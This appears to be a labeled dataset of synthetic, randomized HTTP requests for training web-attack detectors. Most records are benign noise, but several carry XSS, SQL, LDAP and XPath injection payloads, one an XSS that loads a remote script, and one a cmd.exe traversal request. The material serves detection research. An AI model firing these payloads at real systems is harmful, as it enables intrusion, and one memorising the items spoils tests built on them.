UA-Color: color16
UA-Pixels: 4640x2891
Via: 0.5 48.45.210.112
Transfer-Encoding: compress
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 978 www.pil8e.html "ohLjpsuln" 
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30298
Start - Id: 34022
class: Valid
PUT /eorwtinsg/e9aso1enbhmeIaxr/iGaKD17ayaoKv/sOLaB0UiVIvR5e0/tT/YO@DV.RlZML5script/g-.RMdXV8mBoMg6v@SUT/uWUqEhIfvSG1Pu.pl? HTTP/1.1
Content-Length: 300
Content-Language: Rd
Content-Encoding: identity
Content-Location: http://6yemsgS.biz/se7rotId/tErs.bin
Content-MD5: ZXU0cGFFbWNhbnRsbHd0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Apr 06 19:39:23 GMT
Last-Modified: Thu, 07 May 09 03:55:23 GMT
Host: 239.53.108.128:80
Connection: keep-alive
Accept: image/*;q=0.6, text/xml;q=0.3, image/jpeg
Accept-Charset: us-ascii, cp-936, windows-1250;q=0.8
Accept-Encoding: identity, gzip, identity;q=0.9
Accept-Language: Imlso-ge, cihHdirs-iut, ulN3It-csrR4whn;q=0.3, LWnn5-xIoOse;q=0.2
Cache-Control: no-transform
Client-ip: 136.80.151.97
Cookie: tht8Anltnd=3;wrkhd0=mrlNkz;brESmct=nsm4SsEoihq
Cookie2: $Version="603"
Date: Fri, 03 Oct 08 10:05:47 GMT
ETag: "Op_1CJUhrhYpXmqPza8x"
Expect: 100-continue
From: ohes@7Wel.be
If-Modified-Since: Mon, 25 Jul 05 01:16:46 CET
If-Unmodified-Since: Sun, 20 Mar 05 09:32:40 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Jul 07 19:46:47 CET
Max-Forwards: 0
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="e1daBaB880769B8DB1eDfe45BEcDDeCC"
Range: 648-,5555-432185,389-15
Referer: /ra7gr/ta7jlsa/Thlft/tttet.txt
TE: chunked,gzip
Trailer: Connection
User-Agent: Mozilla/7.1 (compatible; MSIE 3.6; Win 9x; IKfee; cs4ie; 9wtsjom)
UA-CPU: PowerPC
UA-Disp: 6904,9748,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 236x091
Via: 5.2 www.CaIids.png, FTP/7.0 238.49.164.168
Transfer-Encoding: oAeatr; naiote0s=drtE
Upgrade: anaia/9.7, aiu/9.9, oWi5re/8.7
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 246.248.207.159
X-Serial-Number: 9331519831899367
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

oks=2ir1ueR&8whHcecei96tata= hEo&iohonad=oatshbloxmlw&alnoasezep=c iqo;@hgeert tmp0&apeepgt=ottr&0wi9esnbmdf=jnrngaaeM&nOoem=s3YDCIwdpIVq&3ti9ceaiaesamya=ir51fkno3ews5yts&JPN4cZ=611875252&metdn2=tgotnnph-yLgroea&n1xumdn=sonsia&tg0EuChjeseRwta=aYdg&S"i z"Oep&aTznNfP.s=5884667&ojr=aaY-pfqn46

End - Id: 34022
Start - Id: 33712
class: Valid
PUT /fdSjta/rf/t0/tUgT0cpLb35-/tl3dtrenez/.Na2lBw8DbJlvt.jpg? HTTP/1.0
Content-Length: 82
Content-Language: aFs9er
Content-Encoding: gzip
Content-Location: http://ojssetlo.com/daut.fgf
Content-MD5: ZGxyUnRiRXNVcnlob3VlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Mon, 12 Jan 04 18:33:59 UTC
Host: 84.59.138.4
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-3;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 16.66.77.9
Cookie: tt=aSi;sh_l.=179
Cookie2: $Version="75"
Date: Sat, 31 Jul 04 08:39:11 UTC
ETag: "7DuOUIJ1TZfdnVUl"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Sun, 07 Mar 04 02:49:30 GMT
If-Unmodified-Since: Wed, 12 Sep 07 12:33:22 UTC
If-Match: *
If-None-Match: "Fr@zhe2PbnQ3W@gHon"
If-Range: "xIQGwFd3IO1LuWG57e"
Max-Forwards: 02
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: eiyE Yas0yi=RjsLiEa
Range: 521419-715172,4927-26503,-3630
Referer: /ntc0enl/mhyisoz7.tiff
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.1 (compatible; Konqueror/2.4; Win 9x; liaNuriwng; hhpah)
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 520x205
Via: HTTP/3.0 36.69.189.9, HTTP/1.7 www.ndntwe.htm:2231
Transfer-Encoding: deflate
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 160.35.127.98
X-Serial-Number: 695598853636
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

gwZv1y5IIE=draoagH&tlPhghda=m7@XuPJ7yF&fpShiuNho0sehhi=ocie?th sr2B&ze[igu

End - Id: 33712
Start - Id: 46944
class: XSS
PUT /_yJpsystems_Po4/eNSmxvkw7ZhxcgCR/ejow6ydstb06enDekr/agO/umwinntTgoNtmpSb9/vloQ0VPt/nq52eZf/SstyleJSEiEVKinincz_P/7tp@mZYDbG@w6D/mwZIl7wM.gif? HTTP/1.0
Content-Length: 65
Content-Language: a1
Content-Encoding: compress
Content-Location: /1cRNnvts/x5pshd/eeoli/eterixn.tar.gz
Content-MD5: bTJhdG1oTGFnYWh0dGUydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Thu, 15 Jun 06 20:48:30 GMT
Host: www.okrnsn.net
Connection: bochlrw9
Accept: image/*;q=0.9
Accept-Charset: hz-gb-2312, windows-1252
Accept-Encoding: gzip, deflate
Accept-Language: las9-dtsIis, 4e9NSmen-i;q=0.0, slaani-serar;q=0.5
Cache-Control: no-transform
Client-ip: 193.249.16.142
Cookie: afys3nrelsN=nmnertiw
Cookie2: $Version="22"
Date: Sat, 09 Jun 07 01:56:09 UTC
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
If-Modified-Since: Mon, 27 Jul 09 08:32:19 GMT
If-Unmodified-Since: Tue, 25 Jan 05 14:17:47 UTC
If-Match: "RyE260VFVQOsLC1@LfU5"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.6
Pragma: no-cache
Authorization: Basic cmlycnU6b2NuaWl0
Range: 16111-
Referer: /advbnUo/yTr1.wmn
TE: trailers,deflate;q=0.8,trailers
User-Agent: sPKJ3boXuL http://www.itn7i3l.net
Via: HTTP/3.7 www.eaftusE.css:17, HTTP/0.9 www.59sByr.jpg, 6.8 143.145.105.237
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dhis8n0dz=003&aOclc=&{[alert   ('axee');]};

End - Id: 46944
Start - Id: 41197
class: SqlInjection
GET /teo.aspx?STohekoi=69294&dirshjdD=%3Ci2tdyoxpassthru%2F&enhednyz2lteim=eOms&atsdsoc=sAyo3Cc3vJc&uei=dropb&B7pqn3YiyN=4416&nbRnan9wxqvsh=673&o6Qform@9c7nsw=elogti&lslicho=14867106&N0jkhwp-4l1d=ennrohoahyL0 HTTP/1.1
Host: 43.103.62.116
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-6;q=0.1, windows-1253, koi8-r;q=0.6, euc-jp
Accept-Encoding: deflate;q=0.0
Accept-Language: ')     UN/**/ION     ALL SEL/**/ECT  'eYa',8,03,'et',9    FROM oehhceIeF  WHERE     (    ''  ='
Cache-Control: only-if-cached
Client-ip: 28.28.15.165
Cookie: eds=ey;gnlrlnc=s5YH
Cookie2: $Version="63"
Date: Fri, 02 May 08 02:23:14 CET
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: 100-continue
From: dH7gh@vEohnlmirz.net
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Mon, 10 Mar 08 13:05:15 UTC
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: *
Max-Forwards: 96
MIME-Version: 1.2
Pragma: e='onya'
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: Digest cnonce="jnEa"
Range: 06442-,27097-,92-912
Referer: http://thdi.fr/lhahe/EuulD/snNbsa.cfm
TE: trailers,trailers
Trailer: Referer
User-Agent: z3vfuAXN http://www.eDnaiiM.be
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: 2.9 71.4.185.68:81, 0mshp/5.6 www.s6xet.htm:04450
Transfer-Encoding: cowmit; cInc=evo6et
Upgrade: palt/3.5, ine2/0.4
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41197
Start - Id: 27127
class: Valid
GET /bGC4OUE8PEdjMB11/rT9N5EHKbRjm/alxm90fM28dJH2d_/cjux3-We9o6m_/h8vFXZQWKxx/1XnYR.cgi?rn=35&utd=c2EP6vCYN&VoetU5is=c8traMAkoeeezlt8In&ehsad4nihqb=4&uheEmezsfl=8&9orPHhjand=541220&iM3K9KebetweenwinntW2s=sM1eukfS&C0e=6&st1netiRs7na=phe&tenn=i7%3Dnv&Ir71De9emna5=ffxt7T%5CMhENi&qNXp=75641120&naiHehc4o0n9ig=position&cojo8hrsslec=t5t_HbZX2Q&r2kt=s HTTP/1.1
Host: www.of7reen.ch:4
Connection: oltje
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: mesttf-qatvjs;q=0.5, yqd-mLkep
Cache-Control: no-store
Client-ip: 48.50.170.183
Cookie: 0did8rchildIqctxA=tneasuybtaUi;nyicxhh8fmliy=e1\;2hqBFuvarMhbhome=eaaih3b;ssEmnviow13e=or
Cookie2: $Version="926"
Date: Wed, 24 Jan 07 11:02:30 UTC
ETag: "cR@krZP4Fect@PPa6kM0"
Expect: tmhllOl=rJmr;9iei=lmael
From: autmrtph@gdspioa8s.it
If-Modified-Since: Sat, 08 Sep 07 20:09:44 GMT
If-Unmodified-Since: Tue, 29 Jan 08 02:55:32 CET
If-Match: "IFAoZaYkaNk-x_rF3zye"
If-None-Match: *
If-Range: "maErYNNsfMqUsgb@rc6X"
Max-Forwards: 42
MIME-Version: 4.2
Pragma: tgqoe=d
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: diom hfoioe=rrah
Range: 876-071,453044-67,-1
Referer: /qe4i68ns/iuTevcr/nm2nof.doc
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/7.0 (Windows; U; WinNT 9.6; 6t-rs; rv:0.2.1) Gecko/48480129
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2873x022
Via: HTTP/4.4 www.ontuttp.tiff, 1.9 151.25.124.196
Transfer-Encoding: deflate
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27127
Start - Id: 1311
class: Valid
GET /cts/lO1f/ne/@fTb/nt2o_etf9En/oIt0iaad3sanI3h/tpl6X/tr/boyNjKu7F/z@JpOpxCbs4ly2./t4DiaoJ.htm? HTTP/1.0
Host: www.teez.ch
Connection: keep-alive
Accept: video/mpeg, audio/*
Accept-Charset: iso-8859-7, windows-1254;q=0.1, x-mac-arabic;q=0.9, x-mac-arabic;q=0.6
Accept-Encoding: compress;q=0.7, compress;q=0.1, deflate;q=0.7, gzip
Accept-Language: *
Cache-Control: min-fresh=92
Client-ip: 213.92.26.169
Cookie: eilnaioNfpN4=ii;utas3aiEbCetna=union';n656u=iS0xzLD2;sts=3807
Cookie2: $Version="5"
Date: Mon, 07 May 07 20:14:51 GMT
ETag: W/"zd6qw1kLW-ebI-o2"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Sat, 25 Aug 07 04:07:15 CET
If-Unmodified-Since: Wed, 04 May 05 20:30:54 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Dec 04 22:23:30 CET
Max-Forwards: 72
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: rrcq ezioa=edlmjced
Range: -216
Referer: http://www.cc7g0dT.be/doebiv9.php3
TE: chunked,gzip;q=0.0,gzip;q=0.2
Trailer: Host
User-Agent: nfs7hsu/0.6.4.0
UA-CPU: Sparc
UA-Disp: 142,095,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: tIewee/8.4 106.252.118.214:31, jitm/7.9 www.hEnr.png
Transfer-Encoding: deflate
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 855751913795
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1311
Start - Id: 38846
class: LdapInjection
GET /mgf8iaanrrs/r2XOS@/8v@Z/a2_mSC8AnManva/iferisajgtHi/ZU3window.open-Awindow.open/sranv2tht/obUf/eL/D@I1btmptTPEPYH4Z/ha2haWgCGWW8/anHJD.dll?inpstkhtinea=%29+%28+++%7C+++%28displayName%3Dhad*%29++%28name+%3Dhad*+++%29%28++mail%3Dhad*%29&tt3il=t7nWafaocnnonttul&Jr14O8NrP=jwa HTTP/1.0
Host: www.aewtleA.net
Connection: close
Accept: text/*, video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 110.83.94.179
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="073"
Date: Fri, 15 May 09 16:35:58 GMT
ETag: "JZD0MOEfX05sNuM9Pe"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Mon, 02 Mar 09 12:45:14 GMT
If-Unmodified-Since: Tue, 14 Apr 09 11:48:35 CET
If-Match: "IfUvpCSx2-ItSCJn4qq2"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: "olFOgZTknQx9bie"
Max-Forwards: 334
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="sSsd"
Authorization: w8sr uootMaty=ebwg
Range: 107-0488
Referer: /tdeiEa.cgi
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.5 (compatible; MSIE 0.3; Windows NT; hmileenc; aexsTnf4; kMpoEt8)
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 072x4241
Via: HTTP/7.1 www.khiwjou.tiff, 7.8 www.4nSeet.js:2, HTTP/3.8 14.37.255.45
Transfer-Encoding: identity
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 74857144808284221
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38846
Start - Id: 47404
class: XSS
GET /nAtohsi/sUoH.meRlKgi/iyeimAwon/e_7Cqs/hk/flDpo.Nn@FZb6ZRK/e0tsnsd/tqon/f2/uiframe9J4sock_streamdivX/hxi7on2aiemosh8bnsa.nsf?sibtBonhrfSei=75769959&iepzgearh2chuwn=UU1omcdsabe%24m&2oe94aer=sasdgmgrgytetceSub2dn%25&WfC23NYbbhus=39056589&xudo=857060029&t5ceieeeaimAcTo=taodifHcformtk&gmioieaibSgSe=%3Cdiv++++style+%3D+++%22+++++behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.algesene.com%2Fscript%2Faat7arie.php%5D%29%3B+++++%22%3E&6nnEaitiih9yhA=ip1WY&cg=6915&xceytg6y=ueniof&zrfoduSxomF7t=ae9h&e8n9lr=shdB%2Fb%3A&pe1ieydiouniate=urbykrteenuenn HTTP/1.1
Host: www.er7eltr.com:80
Connection: rndeni
Accept: */*
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Mon, 29 Sep 08 17:51:15 CET
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Mon, 10 May 04 01:17:50 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 09 Oct 05 08:09:05 UTC
Max-Forwards: 0
MIME-Version: 0.3
Pragma: tziO=et
Proxy-Authorization: Digest realm
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: http://www.xe0nspt.org/nixzyIOo/nDaPtuEi/zowaae6h/4ntA3/lluolaii.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 2.3; ie-ta; rv:0.9.6) Gecko/22375637
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/1.3 92.253.224.93, FTP/3.9 www.leNJy.jpg
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 981746915
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47404
Start - Id: 6426
class: Valid
PUT /tva5UDqdn.uv_/gbemil/oCgvK/fsps3i1e/LeorreplaceEQv.asmx? HTTP/1.0
Content-Length: 22
Content-Language: iya,e9j6
Content-Encoding: gzip
Content-Location: /creeka.swf
Content-MD5: YXJ1c2lndHo4eWJ2dnI1Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Mar 09 09:00:56 UTC
Last-Modified: Thu, 11 Sep 08 19:13:24 GMT
Host: 159.148.71.215
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 139.105.174.152
Cookie: swtelsTite=ehe6gvwontAEh;cbaaihagdteie=95396627;vservices797_nLxp_8G=slbt
Cookie2: $Version="622"
Date: Sun, 25 Dec 05 19:28:15 GMT
ETag: "IRsZTZ3VayBEvhF"
Expect: navl=esus;1b2ni=eqtheF
From: 5onfgr@tttceuz.gov
If-Modified-Since: Sat, 27 Aug 05 20:33:08 GMT
If-Unmodified-Since: Fri, 10 Jun 05 19:04:02 UTC
If-Match: "lHIEEva@5GiaqX.V9mxw"
If-None-Match: "brF.91e_n19vHiL2gMW"
If-Range: Fri, 09 Apr 04 07:42:29 CET
Max-Forwards: 82
MIME-Version: 5.7
Pragma: toj=Wwa
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest realm
Range: -187,296532-
Referer: http://www.edoa.org/UrFno.mdb
TE: chunked;q=0.9,trailers,trailers
Trailer: Accept
User-Agent: e8atznenenwmneOh
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 572x754
Via: 0.6 42.113.236.213, 0.8 178.100.217.226:09215
Transfer-Encoding: gzip
Upgrade: gko/6.5, bl3nza/7.0, loeocy/0.0
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Htry=qtgibtn8e0teOdr7s

End - Id: 6426
Start - Id: 48940
class: XPathInjection
GET /8nfM/cQV@T7/iaaRlrcinIxos0sa/tmfUQ8WS/zIgO3L8Mo399.shtml?efnohdseh=AtUs&bomaa7otnhYlr=87+++or+++1%3C+cEa%2Fa%2F4s8orz%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D46%5D++++or+++540%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: www.mee3iyd.be
Connection: RamO
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: En=jc
Client-ip: 163.68.137.81
Cookie: ruAiceo=k3syo
Cookie2: $Version="818"
Date: Wed, 10 Sep 08 14:34:47 GMT
ETag: "Wnu8c7V6mR2JtbrB"
Expect: ghd27=dnsedlo;desEue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 20 Mar 04 08:12:22 GMT
If-Unmodified-Since: Tue, 21 Jun 05 06:55:29 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 0449
MIME-Version: 5.2
Pragma: d='todogc'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic dDhhZms6ZWU0aTl0
Range: 326-470558,-0121
Referer: /hteo/bslsvuho/h9ph.pl
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 3.1; en-ty; rv:0.3.1) Gecko/94878101
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/3.7 www.ftrdetb.gif, FTP/2.3 71.122.154.30, 2.5 www.raolifss.js
Transfer-Encoding: deflate
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 129 www.iLdnews.tiff:319 "mv1aiMea" "Wed, 18 Oct 06 24:35:06 CET"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48940
Start - Id: 26781
class: Valid
GET /egklEdkJ-S-YVMvqw/2J8xwvufallWjmOzu/ad0kFgIJDx5/P1CUcfftpA/D0H40qKv/7borpacik4n/8wtsbfntdntli/poVA.VKl..shtml?kats7nhI=ldw7u_Z7&9s9qtfntnheeani=dshmb5tex%7E&aicq=evaqdj%3Fschiuml&nB.jf=psIqZM5lH2&tkatlcs=r5s0lerrahIednels&eluir62zfi=swxEs&aeeqaeM4oSlem=ea&BDwoCg%ujPL=%3Frnra HTTP/1.1
Host: 3.230.17.103
Connection: Rgdu9Btx
Accept: audio/*;q=0.1
Accept-Charset: x-mac-hebrew;q=0.0, windows-1250
Accept-Encoding: 
Accept-Language: itFs3-ecb
Cache-Control: min-fresh=193
Client-ip: 120.60.149.77
Cookie: 6ae3melade=c/htacces|E;yhuagee=hHeraiNdOrormsetod;aasogrOSnil=uGyLmStU3C;GexecjhC=ortNd)ch|nganaohiol
Cookie2: $Version="64"
Date: Tue, 20 Jan 09 10:00:06 UTC
ETag: "n4QOBY7mlRAI54Zy-x"
Expect: 100-continue
From: 9eMfoo@wXn4t.uk
If-Modified-Since: Fri, 15 Sep 06 20:14:08 CET
If-Unmodified-Since: Tue, 26 Jan 10 11:08:01 GMT
If-Match: *
If-None-Match: "wCGLgJMuyfJgikPLqK"
If-Range: Thu, 25 Sep 08 13:13:05 GMT
Max-Forwards: 92
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: desDsm geshl54E=ngonva
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: -42,515917-,2250-
Referer: http://ittc.net/9rbnnxs/aeprvARo.mspx
TE: chunked;q=0.1
Trailer: From
User-Agent: Mozilla/4.3 (compatible; Tuooo; Win 9x; rtai; Arruie; csrnqeoc)
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 358x270
Via: 6.9 4.146.120.66
Transfer-Encoding: deflate
Upgrade: coar/9.8
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 51104
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26781
Start - Id: 44497
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 125.172.235.206:80
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, isiri-3342;q=0.3, x-mac-turkish, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: ltgie-dnqxweee, hbt-etnoEl
Cache-Control: only-if-cached
Client-ip: 224.120.218.101
Cookie: 3zmse=NL)6tiihsh
Cookie2: $Version="20"
Date: Tue, 24 Apr 07 17:49:45 CET
ETag: "IUVO4qgAnfRz99rZqxh"
Expect: 100-continue
From: fo6stv@wTex.net
If-Modified-Since: Tue, 13 Apr 10 19:58:13 GMT
If-Unmodified-Since: Tue, 07 Jul 09 10:23:58 CET
If-Match: "9lW@w5zMZ30TdCu5zXcB"
If-None-Match: "7.q_o8Zr@t3oEVZ.si"
If-Range: *
Max-Forwards: 6087
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM c2hhdTB0b3RpY29rdHBUMmVlVHI1bWhnaW93ZGxvZWVmcnM=
Range: -80,3-,-9028
Referer: /m8um.sh
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.9 (Windows; U; WinNT 9.6; df-oi; rv:8.2.0) Gecko/99639122
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: FTP/4.0 2.248.65.229:8462
Transfer-Encoding: deflate
Upgrade: eoke/8.6, mnenb/6.1, 5nls/8.7
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44497
Start - Id: 25823
class: Valid
GET /d1rnqkk/ehlne/cQsms/sihen2liwir/jRerflN7eon/ik5tbz/npdml4slnehn4oi/rJLXF/yxae/umTtvomlcoO/g4kO/thrP.shtml?sppj3swor1ltfnl=3972561&whPsCandoiosl=cntoaeye+&Guhome.kD=2&M0dmailh3wj1Udt=8evalNriEm&4Cc-ZWoT8oA=881941&VU5null1F=vnl&scet2nEi6lia=63td0iiit HTTP/1.0
Host: www.srnydn3t.st
Connection: close
Accept: */*
Accept-Charset: shift_jis, windows-1257, x-mac-cyrillic;q=0.9, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: 5sbig=4hqztts
Client-ip: 253.102.123.168
Cookie: tcrsrOo=442;or9eAlqe8nu=1875878134;WTpLDQqknph-=R1
Cookie2: $Version="869"
Date: Tue, 27 Sep 05 19:30:11 GMT
ETag: W/"6-0IUYXuknh3eEUE"
Expect: vslup=28saei1e
From: ehrr@sqgr.com
If-Modified-Since: Tue, 24 Jan 06 22:55:01 GMT
If-Unmodified-Since: Sun, 26 Jun 05 03:49:20 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 592
MIME-Version: 0.0
Pragma: h=En
Proxy-Authorization: Digest uri=http://tseiT5w.ch/3hoeTtpe/ueeanc/polor7yc.tiff
Authorization: NTLM d2NjZWNkYW1EYWVPaW9ldHNFdGRsb3J4ZW5zSWpsYWJiaGZobnc2bWllTGhj
Range: 644-,-02
Referer: http://www.eiS5in.be/jonthe/rrtElq.jpeg
TE: gzip;q=0.0
Trailer: Accept-Charset
User-Agent: zttz3/7.7.0.1.2
UA-CPU: MIPS
UA-Disp: 733,9248,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3296x601
Via: 0.8 www.Muays.htm, FTP/9.9 155.204.20.255, FTP/3.9 www.uRtdsn.jpeg:67591
Transfer-Encoding: po2a2t; aetdtd=6riwe2d
Upgrade: andf/8.3, dmn/5.9, 4hni/6.0
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 243.205.213.82
X-Serial-Number: 5771791492061
----: ----------------
